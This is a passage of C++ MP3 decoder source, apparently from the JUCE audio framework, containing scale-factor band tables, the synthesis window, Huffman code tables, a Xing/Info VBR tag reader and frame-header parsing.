{0, 4 * 3, 8 * 3, 12 * 3, 18 * 3, 26 * 3, 36 * 3, 48 * 3, 62 * 3, 80 * 3, 104 * 3, 136 * 3, 180 * 3, 192 * 3},
{4, 4, 4, 6, 8, 10, 12, 14, 18, 24, 32, 44, 12 } },
{ {0, 6, 12, 18, 24, 30, 36, 44, 54, 66, 80, 96, 116, 140, 168, 200, 238, 284, 336, 396, 464, 522, 576},
{6, 6, 6, 6, 6, 6, 8, 10, 12, 14, 16, 20, 24, 28, 32, 38, 46, 52, 60, 68, 58, 54 },
{0, 4 * 3, 8 * 3, 12 * 3, 18 * 3, 26 * 3, 36 * 3, 48 * 3, 62 * 3, 80 * 3, 104 * 3, 134 * 3, 174 * 3, 192 * 3},
{4, 4, 4, 6, 8, 10, 12, 14, 18, 24, 30, 40, 18 } },
{ {0, 6, 12, 18, 24, 30, 36, 44, 54, 66, 80, 96, 116, 140, 168, 200, 238, 284, 336, 396, 464, 522, 576},
{6, 6, 6, 6, 6, 6, 8, 10, 12, 14, 16, 20, 24, 28, 32, 38, 46, 52, 60, 68, 58, 54},
{0, 12, 24, 36, 54, 78, 108, 144, 186, 240, 312, 402, 522, 576},
{4, 4, 4, 6, 8, 10, 12, 14, 18, 24, 30, 40, 18} },
{ {0, 6, 12, 18, 24, 30, 36, 44, 54, 66, 80, 96, 116, 140, 168, 200, 238, 284, 336, 396, 464, 522, 576},
{6, 6, 6, 6, 6, 6, 8, 10, 12, 14, 16, 20, 24, 28, 32, 38, 46, 52, 60, 68, 58, 54},
{0, 12, 24, 36, 54, 78, 108, 144, 186, 240, 312, 402, 522, 576},
{4, 4, 4, 6, 8, 10, 12, 14, 18, 24, 30, 40, 18} },
{ {0, 12, 24, 36, 48, 60, 72, 88, 108, 132, 160, 192, 232, 280, 336, 400, 476, 566, 568, 570, 572, 574, 576},
{12, 12, 12, 12, 12, 12, 16, 20, 24, 28, 32, 40, 48, 56, 64, 76, 90, 2, 2, 2, 2, 2},
{0, 24, 48, 72, 108, 156, 216, 288, 372, 480, 486, 492, 498, 576},
{8, 8, 8, 12, 16, 20, 24, 28, 36, 2, 2, 2, 26} }
};
constexpr double decodeWindow[] =
{
0.000000000, -0.000015259, -0.000015259, -0.000015259, -0.000015259, -0.000015259, -0.000015259, -0.000030518,
-0.000030518, -0.000030518, -0.000030518, -0.000045776, -0.000045776, -0.000061035, -0.000061035, -0.000076294,
-0.000076294, -0.000091553, -0.000106812, -0.000106812, -0.000122070, -0.000137329, -0.000152588, -0.000167847,
-0.000198364, -0.000213623, -0.000244141, -0.000259399, -0.000289917, -0.000320435, -0.000366211, -0.000396729,
-0.000442505, -0.000473022, -0.000534058, -0.000579834, -0.000625610, -0.000686646, -0.000747681, -0.000808716,
-0.000885010, -0.000961304, -0.001037598, -0.001113892, -0.001205444, -0.001296997, -0.001388550, -0.001480103,
-0.001586914, -0.001693726, -0.001785278, -0.001907349, -0.002014160, -0.002120972, -0.002243042, -0.002349854,
-0.002456665, -0.002578735, -0.002685547, -0.002792358, -0.002899170, -0.002990723, -0.003082275, -0.003173828,
-0.003250122, -0.003326416, -0.003387451, -0.003433228, -0.003463745, -0.003479004, -0.003479004, -0.003463745,
-0.003417969, -0.003372192, -0.003280640, -0.003173828, -0.003051758, -0.002883911, -0.002700806, -0.002487183,
-0.002227783, -0.001937866, -0.001617432, -0.001266479, -0.000869751, -0.000442505, 0.000030518, 0.000549316,
0.001098633, 0.001693726, 0.002334595, 0.003005981, 0.003723145, 0.004486084, 0.005294800, 0.006118774,
0.007003784, 0.007919312, 0.008865356, 0.009841919, 0.010848999, 0.011886597, 0.012939453, 0.014022827,
0.015121460, 0.016235352, 0.017349243, 0.018463135, 0.019577026, 0.020690918, 0.021789551, 0.022857666,
0.023910522, 0.024932861, 0.025909424, 0.026840210, 0.027725220, 0.028533936, 0.029281616, 0.029937744,
0.030532837, 0.031005859, 0.031387329, 0.031661987, 0.031814575, 0.031845093, 0.031738281, 0.031478882,
0.031082153, 0.030517578, 0.029785156, 0.028884888, 0.027801514, 0.026535034, 0.025085449, 0.023422241,
0.021575928, 0.019531250, 0.017257690, 0.014801025, 0.012115479, 0.009231567, 0.006134033, 0.002822876,
-0.000686646, -0.004394531, -0.008316040, -0.012420654, -0.016708374, -0.021179199, -0.025817871, -0.030609131,
-0.035552979, -0.040634155, -0.045837402, -0.051132202, -0.056533813, -0.061996460, -0.067520142, -0.073059082,
-0.078628540, -0.084182739, -0.089706421, -0.095169067, -0.100540161, -0.105819702, -0.110946655, -0.115921021,
-0.120697021, -0.125259399, -0.129562378, -0.133590698, -0.137298584, -0.140670776, -0.143676758, -0.146255493,
-0.148422241, -0.150115967, -0.151306152, -0.151962280, -0.152069092, -0.151596069, -0.150497437, -0.148773193,
-0.146362305, -0.143264771, -0.139450073, -0.134887695, -0.129577637, -0.123474121, -0.116577148, -0.108856201,
-0.100311279, -0.090927124, -0.080688477, -0.069595337, -0.057617187, -0.044784546, -0.031082153, -0.016510010,
-0.001068115, 0.015228271, 0.032379150, 0.050354004, 0.069168091, 0.088775635, 0.109161377, 0.130310059,
0.152206421, 0.174789429, 0.198059082, 0.221984863, 0.246505737, 0.271591187, 0.297210693, 0.323318481,
0.349868774, 0.376800537, 0.404083252, 0.431655884, 0.459472656, 0.487472534, 0.515609741, 0.543823242,
0.572036743, 0.600219727, 0.628295898, 0.656219482, 0.683914185, 0.711318970, 0.738372803, 0.765029907,
0.791213989, 0.816864014, 0.841949463, 0.866363525, 0.890090942, 0.913055420, 0.935195923, 0.956481934,
0.976852417, 0.996246338, 1.014617920, 1.031936646, 1.048156738, 1.063217163, 1.077117920, 1.089782715,
1.101211548, 1.111373901, 1.120223999, 1.127746582, 1.133926392, 1.138763428, 1.142211914, 1.144287109,
1.144989014
};
constexpr int16 huffmanTab0[] = { 0 };
constexpr int16 huffmanTab1[] = { -5,-3,-1,17,1,16,0 };
constexpr int16 huffmanTab2[] = { -15,-11,-9,-5,-3,-1,34,2,18,-1,33,32,17,-1,1,16,0 };
constexpr int16 huffmanTab3[] = { -13,-11,-9,-5,-3,-1,34,2,18,-1,33,32,16,17,-1,1,0 };
constexpr int16 huffmanTab5[] = { -29,-25,-23,-15,-7,-5,-3,-1,51,35,50,49,-3,-1,19,3,-1,48,34,-3,-1,18,33,-1,2,32,17,-1,1,16,0 };
constexpr int16 huffmanTab6[] = { -25,-19,-13,-9,-5,-3,-1,51,3,35,-1,50,48,-1,19,49,-3,-1,34,2,18,-3,-1,33,32,1,-1,17,-1,16,0 };
constexpr int16 huffmanTab7[] =
{
-69,-65,-57,-39,-29,-17,-11,-7,-3,-1,85,69,-1,84,83,-1,53,68,-3,-1,37,82,21,-5,-1,81,-1,5,52,-1,80,-1,67,51,
-5,-3,-1,36,66,20,-1,65,64,-11,-7,-3,-1,4,35,-1,50,3,-1,19,49,-3,-1,48,34,18,-5,-1,33,-1,2,32,17,-1,1,16,0
};
constexpr int16 huffmanTab8[] =
{
-65,-63,-59,-45,-31,-19,-13,-7,-5,-3,-1,85,84,69,83,-3,-1,53,68,37,-3,-1,82,5,21,-5,-1,81,-1,52,67,-3,-1,80,
51,36,-5,-3,-1,66,20,65,-3,-1,4,64,-1,35,50,-9,-7,-3,-1,19,49,-1,3,48,34,-1,2,32,-1,18,33,17,-3,-1,1,16,0
};
constexpr int16 huffmanTab9[] =
{
-63,-53,-41,-29,-19,-11,-5,-3,-1,85,69,53,-1,83,-1,84,5,-3,-1,68,37,-1,82,21,-3,-1,81,52,-1,67,-1,80,4,-7,-3,
-1,36,66,-1,51,64,-1,20,65,-5,-3,-1,35,50,19,-1,49,-1,3,48,-5,-3,-1,34,2,18,-1,33,32,-3,-1,17,1,-1,16,0
};
constexpr int16 huffmanTab10[] =
{
-125,-121,-111,-83,-55,-35,-21,-13,-7,-3,-1,119,103,-1,118,87,-3,-1,117,102,71,-3,-1,116,86,-1,101,55,-9,-3,
-1,115,70,-3,-1,85,84,99,-1,39,114,-11,-5,-3,-1,100,7,112,-1,98,-1,69,53,-5,-1,6,-1,83,68,23,-17,-5,-1,113,
-1,54,38,-5,-3,-1,37,82,21,-1,81,-1,52,67,-3,-1,22,97,-1,96,-1,5,80,-19,-11,-7,-3,-1,36,66,-1,51,4,-1,20,
65,-3,-1,64,35,-1,50,3,-3,-1,19,49,-1,48,34,-7,-3,-1,18,33,-1,2,32,17,-1,1,16,0
};
constexpr int16 huffmanTab11[] =
{
-121,-113,-89,-59,-43,-27,-17,-7,-3,-1,119,103,-1,118,117,-3,-1,102,71,-1,116,-1,87,85,-5,-3,-1,86,101,55,
-1,115,70,-9,-7,-3,-1,69,84,-1,53,83,39,-1,114,-1,100,7,-5,-1,113,-1,23,112,-3,-1,54,99,-1,96,-1,68,37,-13,
-7,-5,-3,-1,82,5,21,98,-3,-1,38,6,22,-5,-1,97,-1,81,52,-5,-1,80,-1,67,51,-1,36,66,-15,-11,-7,-3,-1,20,65,
-1,4,64,-1,35,50,-1,19,49,-5,-3,-1,3,48,34,33,-5,-1,18,-1,2,32,17,-3,-1,1,16,0
};
constexpr int16 huffmanTab12[] =
{
-115,-99,-73,-45,-27,-17,-9,-5,-3,-1,119,103,118,-1,87,117,-3,-1,102,71,-1,116,101,-3,-1,86,55,-3,-1,115,
85,39,-7,-3,-1,114,70,-1,100,23,-5,-1,113,-1,7,112,-1,54,99,-13,-9,-3,-1,69,84,-1,68,-1,6,5,-1,38,98,-5,
-1,97,-1,22,96,-3,-1,53,83,-1,37,82,-17,-7,-3,-1,21,81,-1,52,67,-5,-3,-1,80,4,36,-1,66,20,-3,-1,51,65,-1,
35,50,-11,-7,-5,-3,-1,64,3,48,19,-1,49,34,-1,18,33,-7,-5,-3,-1,2,32,0,17,-1,1,16
};
constexpr int16 huffmanTab13[] =
{
-509,-503,-475,-405,-333,-265,-205,-153,-115,-83,-53,-35,-21,-13,-9,-7,-5,-3,-1,254,252,253,237,255,-1,239,223,
-3,-1,238,207,-1,222,191,-9,-3,-1,251,206,-1,220,-1,175,233,-1,236,221,-9,-5,-3,-1,250,205,190,-1,235,159,-3,
-1,249,234,-1,189,219,-17,-9,-3,-1,143,248,-1,204,-1,174,158,-5,-1,142,-1,127,126,247,-5,-1,218,-1,173,188,-3,
-1,203,246,111,-15,-7,-3,-1,232,95,-1,157,217,-3,-1,245,231,-1,172,187,-9,-3,-1,79,244,-3,-1,202,230,243,-1,
63,-1,141,216,-21,-9,-3,-1,47,242,-3,-1,110,156,15,-5,-3,-1,201,94,171,-3,-1,125,215,78,-11,-5,-3,-1,200,214,
62,-1,185,-1,155,170,-1,31,241,-23,-13,-5,-1,240,-1,186,229,-3,-1,228,140,-1,109,227,-5,-1,226,-1,46,14,-1,30,
225,-15,-7,-3,-1,224,93,-1,213,124,-3,-1,199,77,-1,139,184,-7,-3,-1,212,154,-1,169,108,-1,198,61,-37,-21,-9,-5,
-3,-1,211,123,45,-1,210,29,-5,-1,183,-1,92,197,-3,-1,153,122,195,-7,-5,-3,-1,167,151,75,209,-3,-1,13,208,-1,
138,168,-11,-7,-3,-1,76,196,-1,107,182,-1,60,44,-3,-1,194,91,-3,-1,181,137,28,-43,-23,-11,-5,-1,193,-1,152,12,
-1,192,-1,180,106,-5,-3,-1,166,121,59,-1,179,-1,136,90,-11,-5,-1,43,-1,165,105,-1,164,-1,120,135,-5,-1,148,-1,
119,118,178,-11,-3,-1,27,177,-3,-1,11,176,-1,150,74,-7,-3,-1,58,163,-1,89,149,-1,42,162,-47,-23,-9,-3,-1,26,
161,-3,-1,10,104,160,-5,-3,-1,134,73,147,-3,-1,57,88,-1,133,103,-9,-3,-1,41,146,-3,-1,87,117,56,-5,-1,131,-1,
102,71,-3,-1,116,86,-1,101,115,-11,-3,-1,25,145,-3,-1,9,144,-1,72,132,-7,-5,-1,114,-1,70,100,40,-1,130,24,-41,
-27,-11,-5,-3,-1,55,39,23,-1,113,-1,85,7,-7,-3,-1,112,54,-1,99,69,-3,-1,84,38,-1,98,53,-5,-1,129,-1,8,128,-3,
-1,22,97,-1,6,96,-13,-9,-5,-3,-1,83,68,37,-1,82,5,-1,21,81,-7,-3,-1,52,67,-1,80,36,-3,-1,66,51,20,-19,-11,
-5,-1,65,-1,4,64,-3,-1,35,50,19,-3,-1,49,3,-1,48,34,-3,-1,18,33,-1,2,32,-3,-1,17,1,16,0
};
constexpr int16 huffmanTab15[] =
{
-495,-445,-355,-263,-183,-115,-77,-43,-27,-13,-7,-3,-1,255,239,-1,254,223,-1,238,-1,253,207,-7,-3,-1,252,222,-1,
237,191,-1,251,-1,206,236,-7,-3,-1,221,175,-1,250,190,-3,-1,235,205,-1,220,159,-15,-7,-3,-1,249,234,-1,189,219,
-3,-1,143,248,-1,204,158,-7,-3,-1,233,127,-1,247,173,-3,-1,218,188,-1,111,-1,174,15,-19,-11,-3,-1,203,246,
-3,-1,142,232,-1,95,157,-3,-1,245,126,-1,231,172,-9,-3,-1,202,187,-3,-1,217,141,79,-3,-1,244,63,-1,243,216,
-33,-17,-9,-3,-1,230,47,-1,242,-1,110,240,-3,-1,31,241,-1,156,201,-7,-3,-1,94,171,-1,186,229,-3,-1,125,215,
-1,78,228,-15,-7,-3,-1,140,200,-1,62,109,-3,-1,214,227,-1,155,185,-7,-3,-1,46,170,-1,226,30,-5,-1,225,-1,14,
224,-1,93,213,-45,-25,-13,-7,-3,-1,124,199,-1,77,139,-1,212,-1,184,154,-7,-3,-1,169,108,-1,198,61,-1,211,210,
-9,-5,-3,-1,45,13,29,-1,123,183,-5,-1,209,-1,92,208,-1,197,138,-17,-7,-3,-1,168,76,-1,196,107,-5,-1,182,-1,
153,12,-1,60,195,-9,-3,-1,122,167,-1,166,-1,192,11,-1,194,-1,44,91,-55,-29,-15,-7,-3,-1,181,28,-1,137,152,-3,
-1,193,75,-1,180,106,-5,-3,-1,59,121,179,-3,-1,151,136,-1,43,90,-11,-5,-1,178,-1,165,27,-1,177,-1,176,105,-7,
-3,-1,150,74,-1,164,120,-3,-1,135,58,163,-17,-7,-3,-1,89,149,-1,42,162,-3,-1,26,161,-3,-1,10,160,104,-7,-3,
-1,134,73,-1,148,57,-5,-1,147,-1,119,9,-1,88,133,-53,-29,-13,-7,-3,-1,41,103,-1,118,146,-1,145,-1,25,144,-7,
-3,-1,72,132,-1,87,117,-3,-1,56,131,-1,102,71,-7,-3,-1,40,130,-1,24,129,-7,-3,-1,116,8,-1,128,86,-3,-1,101,
55,-1,115,70,-17,-7,-3,-1,39,114,-1,100,23,-3,-1,85,113,-3,-1,7,112,54,-7,-3,-1,99,69,-1,84,38,-3,-1,98,22,
-3,-1,6,96,53,-33,-19,-9,-5,-1,97,-1,83,68,-1,37,82,-3,-1,21,81,-3,-1,5,80,52,-7,-3,-1,67,36,-1,66,51,-1,
65,-1,20,4,-9,-3,-1,35,50,-3,-1,64,3,19,-3,-1,49,48,34,-9,-7,-3,-1,18,33,-1,2,32,17,-3,-1,1,16,0
};
constexpr int16 huffmanTab16[] =
{
-509,-503,-461,-323,-103,-37,-27,-15,-7,-3,-1,239,254,-1,223,253,-3,-1,207,252,-1,191,251,-5,-1,175,-1,250,159,
-3,-1,249,248,143,-7,-3,-1,127,247,-1,111,246,255,-9,-5,-3,-1,95,245,79,-1,244,243,-53,-1,240,-1,63,-29,-19,
-13,-7,-5,-1,206,-1,236,221,222,-1,233,-1,234,217,-1,238,-1,237,235,-3,-1,190,205,-3,-1,220,219,174,-11,-5,
-1,204,-1,173,218,-3,-1,126,172,202,-5,-3,-1,201,125,94,189,242,-93,-5,-3,-1,47,15,31,-1,241,-49,-25,-13,
-5,-1,158,-1,188,203,-3,-1,142,232,-1,157,231,-7,-3,-1,187,141,-1,216,110,-1,230,156,-13,-7,-3,-1,171,186,
-1,229,215,-1,78,-1,228,140,-3,-1,200,62,-1,109,-1,214,155,-19,-11,-5,-3,-1,185,170,225,-1,212,-1,184,169,
-5,-1,123,-1,183,208,227,-7,-3,-1,14,224,-1,93,213,-3,-1,124,199,-1,77,139,-75,-45,-27,-13,-7,-3,-1,154,
108,-1,198,61,-3,-1,92,197,13,-7,-3,-1,138,168,-1,153,76,-3,-1,182,122,60,-11,-5,-3,-1,91,137,28,-1,192,-1,
152,121,-1,226,-1,46,30,-15,-7,-3,-1,211,45,-1,210,209,-5,-1,59,-1,151,136,29,-7,-3,-1,196,107,-1,195,167,-1,
44,-1,194,181,-23,-13,-7,-3,-1,193,12,-1,75,180,-3,-1,106,166,179,-5,-3,-1,90,165,43,-1,178,27,-13,-5,-1,177,
-1,11,176,-3,-1,105,150,-1,74,164,-5,-3,-1,120,135,163,-3,-1,58,89,42,-97,-57,-33,-19,-11,-5,-3,-1,149,104,161,
-3,-1,134,119,148,-5,-3,-1,73,87,103,162,-5,-1,26,-1,10,160,-3,-1,57,147,-1,88,133,-9,-3,-1,41,146,-3,-1,118,
9,25,-5,-1,145,-1,144,72,-3,-1,132,117,-1,56,131,-21,-11,-5,-3,-1,102,40,130,-3,-1,71,116,24,-3,-1,129,128,-3,
-1,8,86,55,-9,-5,-1,115,-1,101,70,-1,39,114,-5,-3,-1,100,85,7,23,-23,-13,-5,-1,113,-1,112,54,-3,-1,99,69,-1,
84,38,-3,-1,98,22,-1,97,-1,6,96,-9,-5,-1,83,-1,53,68,-1,37,82,-1,81,-1,21,5,-33,-23,-13,-7,-3,-1,52,67,-1,80,
36,-3,-1,66,51,20,-5,-1,65,-1,4,64,-1,35,50,-3,-1,19,49,-3,-1,3,48,34,-3,-1,18,33,-1,2,32,-3,-1,17,1,16,0
};
constexpr int16 huffmanTab24[] =
{
-451,-117,-43,-25,-15,-7,-3,-1,239,254,-1,223,253,-3,-1,207,252,-1,191,251,-5,-1,250,-1,175,159,-1,249,248,-9,
-5,-3,-1,143,127,247,-1,111,246,-3,-1,95,245,-1,79,244,-71,-7,-3,-1,63,243,-1,47,242,-5,-1,241,-1,31,240,-25,-9,
-1,15,-3,-1,238,222,-1,237,206,-7,-3,-1,236,221,-1,190,235,-3,-1,205,220,-1,174,234,-15,-7,-3,-1,189,219,-1,204,
158,-3,-1,233,173,-1,218,188,-7,-3,-1,203,142,-1,232,157,-3,-1,217,126,-1,231,172,255,-235,-143,-77,-45,-25,-15,
-7,-3,-1,202,187,-1,141,216,-5,-3,-1,14,224,13,230,-5,-3,-1,110,156,201,-1,94,186,-9,-5,-1,229,-1,171,125,-1,215,
228,-3,-1,140,200,-3,-1,78,46,62,-15,-7,-3,-1,109,214,-1,227,155,-3,-1,185,170,-1,226,30,-7,-3,-1,225,93,-1,213,124,
-3,-1,199,77,-1,139,184,-31,-15,-7,-3,-1,212,154,-1,169,108,-3,-1,198,61,-1,211,45,-7,-3,-1,210,29,-1,123,183,-3,-1,
209,92,-1,197,138,-17,-7,-3,-1,168,153,-1,76,196,-3,-1,107,182,-3,-1,208,12,60,-7,-3,-1,195,122,-1,167,44,-3,-1,194,
91,-1,181,28,-57,-35,-19,-7,-3,-1,137,152,-1,193,75,-5,-3,-1,192,11,59,-3,-1,176,10,26,-5,-1,180,-1,106,166,-3,-1,121,
151,-3,-1,160,9,144,-9,-3,-1,179,136,-3,-1,43,90,178,-7,-3,-1,165,27,-1,177,105,-1,150,164,-17,-9,-5,-3,-1,74,120,135,
-1,58,163,-3,-1,89,149,-1,42,162,-7,-3,-1,161,104,-1,134,119,-3,-1,73,148,-1,57,147,-63,-31,-15,-7,-3,-1,88,133,-1,41,
103,-3,-1,118,146,-1,25,145,-7,-3,-1,72,132,-1,87,117,-3,-1,56,131,-1,102,40,-17,-7,-3,-1,130,24,-1,71,116,-5,-1,129,
-1,8,128,-1,86,101,-7,-5,-1,23,-1,7,112,115,-3,-1,55,39,114,-15,-7,-3,-1,70,100,-1,85,113,-3,-1,54,99,-1,69,84,-7,-3,
-1,38,98,-1,22,97,-5,-3,-1,6,96,53,-1,83,68,-51,-37,-23,-15,-9,-3,-1,37,82,-1,21,-1,5,80,-1,81,-1,52,67,-3,-1,36,66,
-1,51,20,-9,-5,-1,65,-1,4,64,-1,35,50,-1,19,49,-7,-5,-3,-1,3,48,34,18,-1,33,-1,2,32,-3,-1,17,1,-1,16,0
};
struct BitsToTableMap
{
uint32 bits;
const int16* table;
};
constexpr BitsToTableMap huffmanTables1[] =
{
{ 0, huffmanTab0 }, { 0, huffmanTab1 }, { 0, huffmanTab2 }, { 0, huffmanTab3 },
{ 0, huffmanTab0 }, { 0, huffmanTab5 }, { 0, huffmanTab6 }, { 0, huffmanTab7 },
{ 0, huffmanTab8 }, { 0, huffmanTab9 }, { 0, huffmanTab10 }, { 0, huffmanTab11 },
{ 0, huffmanTab12 }, { 0, huffmanTab13 }, { 0, huffmanTab0 }, { 0, huffmanTab15 },
{ 1, huffmanTab16 }, { 2, huffmanTab16 }, { 3, huffmanTab16 }, { 4, huffmanTab16 },
{ 6, huffmanTab16 }, { 8, huffmanTab16 }, { 10, huffmanTab16 }, { 13, huffmanTab16 },
{ 4, huffmanTab24 }, { 5, huffmanTab24 }, { 6, huffmanTab24 }, { 7, huffmanTab24 },
{ 8, huffmanTab24 }, { 9, huffmanTab24 }, { 11, huffmanTab24 }, { 13, huffmanTab24 }
};
constexpr int16 huffmanTabC0[] = { -29,-21,-13,-7,-3,-1,11,15,-1,13,14,-3,-1,7,5,9,-3,-1,6,3,-1,10,12,-3,-1,2,1,-1,4,8,0 };
constexpr int16 huffmanTabC1[] = { -15,-7,-3,-1,15,14,-1,13,12,-3,-1,11,10,-1,9,8,-7,-3,-1,7,6,-1,5,4,-3,-1,3,2,-1,1,0 };
constexpr BitsToTableMap huffmanTables2[] = { { 0, huffmanTabC0 }, { 0, huffmanTabC1 } };
//==============================================================================
struct VBRTagData
{
bool read (const uint8* data) noexcept
{
flags = 0;
const int layer = (data[1] >> 1) & 3;
if (layer != 1)
return false;
const int type = (data[1] >> 3) & 1;
const int sampleRateIndex = (data[2] >> 2) & 3;
const int mode = (data[3] >> 6) & 3;
static constexpr short bitRates[3][16] =
{
{ 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160, -1 }, // MPEG2
{ 0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, -1 }, // MPEG1
{ 0, 8, 16, 24, 32, 40, 48, 56, 64, -1, -1, -1, -1, -1, -1, -1 }, // MPEG 2.5
};
const int bitrate = bitRates[type][((data[2] >> 4) & 15)];
const int sampleRates[3][4] =
{
{ 22050, 24000, 16000, -1 }, // MPEG2
{ 44100, 48000, 32000, -1 }, // MPEG1
{ 11025, 12000, 8000, -1 }, // MPEG2.5
};
if ((data[1] >> 4) == 0xe)
sampleRate = sampleRates[2][sampleRateIndex];
else
sampleRate = sampleRates[type][sampleRateIndex];
data += type != 0 ? (mode != 3 ? (32 + 4) : (17 + 4))
: (mode != 3 ? (17 + 4) : (9 + 4));
if (! isVbrTag (data))
return false;
data += 4;
flags = ByteOrder::bigEndianInt (data);
data += 4;
if (flags & 1)
{
frames = ByteOrder::bigEndianInt (data);
data += 4;
}
if (flags & 2)
{
bytes = ByteOrder::bigEndianInt (data);
data += 4;
}
if (flags & 4)
{
for (int i = 0; i < 100; ++i)
toc[i] = data[i];
data += 100;
}
vbrScale = -1;
if (flags & 8)
vbrScale = (int) ByteOrder::bigEndianInt (data);
headersize = ((type + 1) * 72000 * bitrate) / sampleRate;
return true;
}
uint8 toc[100];
int sampleRate, vbrScale, headersize;
unsigned int flags, frames, bytes;
private:
static bool isVbrTag (const uint8* d) noexcept
{
return (d[0] == 'X' && d[1] == 'i' && d[2] == 'n' && d[3] == 'g')
|| (d[0] == 'I' && d[1] == 'n' && d[2] == 'f' && d[3] == 'o');
}
};
//==============================================================================
struct MP3Frame
{
MP3Frame()
{
zeromem (this, sizeof (MP3Frame));
single = -1;
}
void selectLayer2Table()
{
static constexpr int translate[3][2][16] =
{
{ { 0, 2, 2, 2, 2, 2, 2, 0, 0, 0, 1, 1, 1, 1, 1, 0 }, { 0, 2, 2, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0 } },
{ { 0, 2, 2, 2, 2, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0 }, { 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 } },
{ { 0, 3, 3, 3, 3, 3, 3, 0, 0, 0, 1, 1, 1, 1, 1, 0 }, { 0, 3, 3, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0 } }
};
static const AllocationTable* const tables[] = { allocTable0, allocTable1, allocTable2, allocTable3, allocTable4 };
static constexpr int8 limits[] = { 27, 30, 8, 12, 30 };
const int index = lsf ? 4 : translate[sampleRateIndex][2 - numChannels][bitrateIndex];
layer2SubBandLimit = limits[index];
allocationTable = tables[index];
}
int getFrequency() const noexcept
{
const int frequencies[] = { 44100, 48000, 32000, 22050, 24000, 16000, 11025, 12000, 8000 };
return frequencies[sampleRateIndex];
}
enum class ParseSuccessful { no, yes };
ParseSuccessful decodeHeader (const uint32 header)
{
jassert (((header >> 10) & 3) != 3);
mpeg25 = (header & (1 << 20)) == 0;
lsf = mpeg25 ? 1 : ((header & (1 << 19)) ? 0 : 1);
layer = (int) (4 - ((header >> 17) & 3));
sampleRateIndex = (int) ((header >> 10) & 3) + (mpeg25 ? 6 : (lsf * 3));
crc16FollowsHeader = ((header >> 16) & 1) == 0;
bitrateIndex = (header >> 12) & 15;
padding = (header >> 9) & 1;
mode = (header >> 6) & 3;
modeExt = (header >> 4) & 3;
//extension = (header >> 8) & 1;
//copyright = (header >> 3) & 1;
//original = (header >> 2) & 1;
//emphasis = header & 3;
numChannels = (mode == 3) ? 1 : 2;
static constexpr int frameSizes[2][3][16] =
{
{ { 0, 32, 64, 96, 128, 160, 192, 224, 256, 288, 320, 352, 384, 416, 448 },
{ 0, 32, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 384 },
{ 0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320 } },
{ { 0, 32, 48, 56, 64, 80, 96, 112, 128, 144, 160, 176, 192, 224, 256 },
{ 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160 },
{ 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160 } }
};
if (bitrateIndex == 0)
{
jassertfalse; // This means the file is using "free format". Apparently very few decoders
// support this mode, and this one certainly doesn't handle it correctly!
frameSize = 0;
return ParseSuccessful::no;
}
switch (layer)
{
case 1: frameSize = (((frameSizes[lsf][0][bitrateIndex] * 12000) / getFrequency() + padding) * 4) - 4; break;
case 2: frameSize = (frameSizes[lsf][1][bitrateIndex] * 144000) / getFrequency() + (padding - 4); break;
case 3: frameSize = (bitrateIndex == 0) ? 0 : ((frameSizes[lsf][2][bitrateIndex] * 144000) / (getFrequency() << lsf) + (padding - 4)); break;
default: break;
}
return ParseSuccessful::yes;
}
int layer, frameSize, numChannels, single;
int lsf; // 0 = mpeg-1, 1 = mpeg-2/LSF
bool mpeg25; // true = mpeg-2.5, false = mpeg-1/2
bool crc16FollowsHeader;
int bitrateIndex, sampleRateIndex, padding;
int mode, modeExt, layer2SubBandLimit;
enum { downSampleLimit = 32 };
const AllocationTable* allocationTable;
};
//==============================================================================
struct Constants
{
Constants()
{
cosTables[0] = cos64; cosTables[1] = cos32; cosTables[2] = cos16; cosTables[3] = cos8; cosTables[4] = cos4;
initDecodeTables();
initLayer2Tables();
initLayer3Tables();
}
const uint8* getGroupTable (const int16 d1, const uint32 index) const noexcept
{
switch (d1)
{
case 3: return &group3tab[3 * jmin (index, 3u * 3u * 3u)];
case 5: return &group5tab[3 * jmin (index, 5u * 5u * 5u)];
case 9: return &group9tab[3 * jmin (index, 9u * 9u * 9u)];
default: break;
}
static constexpr uint8 dummy[] = { 0, 0, 0 };
return dummy;
}
float muls[27][64];
float nToThe4Over3[8207];
float antiAliasingCa[8], antiAliasingCs[8];
float win[4][36];
float win1[4][36];
float powToGains[256 + 118 + 4];
int longLimit[9][23];
int shortLimit[9][14];
float tan1_1[16], tan2_1[16], tan1_2[16], tan2_2[16];
float pow1_1[2][16], pow2_1[2][16], pow1_2[2][16], pow2_2[2][16];
int* map[9][3];
int* mapEnd[9][3];
uint32 nLength2[512];
uint32 iLength2[256];
float decodeWin[512 + 32];
float* cosTables[5];
private:
int mapbuf0[9][152];
int mapbuf1[9][156];
int mapbuf2[9][44];
float cos64[16], cos32[8], cos16[4], cos8[2], cos4[1];
uint8 group3tab[32 * 3];
uint8 group5tab[128 * 3];
uint8 group9tab[1024 * 3];
void initDecodeTables()
{
int i, j, scaleval = -1;
float* table = decodeWin;
for (i = 0; i < 5; ++i)
{
int kr = 0x10 >> i;
int divv = 0x40 >> i;
float* costab = cosTables[i];
for (int k = 0; k < kr; ++k)
costab[k] = (float) (1.0 / (2.0 * std::cos (MathConstants<double>::pi * (k * 2 + 1) / divv)));
}
for (i = 0, j = 0; i < 256; ++i, ++j, table += 32)
{
if (table < decodeWin + 512 + 16)
table[16] = table[0] = (float) (decodeWindow[j] * scaleval);
if (i % 32 == 31)
table -= 1023;
if (i % 64 == 63)
scaleval = -scaleval;
}
for (; i < 512; ++i, --j, table += 32)
{
if (table < decodeWin + 512 + 16)
table[16] = table[0] = (float) (decodeWindow[j] * scaleval);
if (i % 32 == 31) table -= 1023;
if (i % 64 == 63) scaleval = -scaleval;
}
}
void initLayer2Tables()
{
static const uint8 base[3][9] =
{
{ 1, 0, 2 },
{ 17, 18, 0, 19, 20 },
{ 21, 1, 22, 23, 0, 24, 25, 2, 26 }
};
static constexpr int tableLengths[] = { 3, 5, 9 };
